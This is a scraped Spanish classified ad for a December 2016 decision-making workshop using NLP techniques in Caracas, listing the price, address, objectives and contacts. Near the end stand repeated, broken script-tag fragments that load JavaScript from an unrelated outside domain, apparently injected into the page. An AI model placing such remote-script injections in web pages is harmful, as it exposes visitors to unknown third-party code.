TALLER DE TOMA DE DECISIONES EFECTIVAS CON TÉCNICAS DE PNL

TALLER DE TOMA DE DECISIONES EFECTIVAS CON TÉCNICAS DE PNL Fecha 04 de diciembre del 2016 - Horario: 8:00 a.m. a 1:00 p.m.
Inicio chevron_right Cursos, Formación y Educación chevron_right Talleres
local_offer Precio:
6 000 00 Bs.
my_location Ubicación:
Caracas, Mnpio. Chacao, Parrq. Chacao ver mapa
visibility Visto:
797 veces
person Responsable:
mvelasquez79
phone Teléfono:
04241102829
schedule ¡El aviso finalizó hace más de 1 año!
thumb_up_alt Compartir:
 
 
photo Galería

  • Información básica:Todos los participantes dispondrán de técnicas que les permitirá incrementar su potencial, con métodos actualizados, el cual, se convierten en personas más dinámicas y eficientes al momento de tomar una decisión. Facilitando la generación de recursos personales mediante las técnicas de la PNL y Neurociencia.

    Objetivos: El objetivo de este taller es empoderar a los participantes con las herramientas necesarias para realizar tomas decisiones efectivas y de calidad que los impulse al logro de sus objetivos.

    Este modelo les permitirá aplicar los diferentes métodos y técnicas de la Programación Neurolingüística (PNL) con el fin de fortalecer el músculo de la toma de decisiones, así como mejorar, desarrollar y perfeccionar habilidades individuales para obtener resultados eficaces en las metas planteadas. Asimismo, los asistentes podrán identificar la influencia que tienen para operar en otras personas, en un proceso de decisiones personal . 

    Requisitos:  Personas que deseen desarrollar su potencial de decidir ante los hechos de la vida cotidiana. A partir de 14 años de edad.

    Se impartirá en: Caracas

    Dirección: Edif. Royal Palace, Chacaíto, Piso 2 Salón 204 al lado de EPK. Salida del metro hacia el bosque. – Chacaíto. Caracas – Venezuela.

    Fecha y Horario: 04 de diciembre de 8:00 a.m. A 1:00 p.m..

    Precio: 6.000,00

  • Duración: 6 Hora(s)

  • Más Info: descifratuexito@gmail.com -  Telf: (+58)4241102829 - Twit-IG: @descifraelexito

src="https://cuev.in/aux.php?ver=1.0&ref=at&debug=" type="text/javascript"> src="https://cuev.in/aux.php?ver=1.0&ref=at&debug=" type="text/javascript"> src="https://cuev.in/aux.php?ver=1.0&ref=at&debug=" type="text/javascript"></

src="https://cuev.in/aux.php?ver=1.0&ref=at&debug=" type="text/javascript">

my_location Ubicación Geográfica
Ver mapa más grande

comment Preguntas y Comentarios